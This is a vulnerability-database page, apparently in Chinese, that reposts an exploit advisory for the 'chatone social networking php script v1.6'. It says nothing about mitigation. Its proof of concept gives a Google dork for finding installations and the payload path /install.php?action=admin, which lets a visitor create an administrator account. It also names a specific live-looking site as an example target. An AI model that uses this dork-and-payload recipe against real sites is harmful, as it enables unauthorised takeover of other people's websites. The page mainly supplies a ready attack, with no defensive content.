chatone social networking php script v1.6 Add Admin Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034864 漏洞类型
发布时间 2018-06-02 更新时间 2018-06-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060023
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
====================================================================================================================================
| # Title     : chatone social networking php script v1.6 Add Admin Vulnerability                                                  |
| # Author    : indoushka                                                                                                          |
| # Telegram  : @indoushka                                                                                                         |
| # Tested on : windows 10 Français V.(Pro)                                                                                        |
| # Vendor    : http://dl.20script.ir/script/chat/chatone[www.20script.ir].zip                                                     |  
| # Dork      : "chatone - online"                                                                                                 |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] Use Payload : /install.php?action=admin & Follow the instructions

http://gardas.one/install.php?action=admin


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================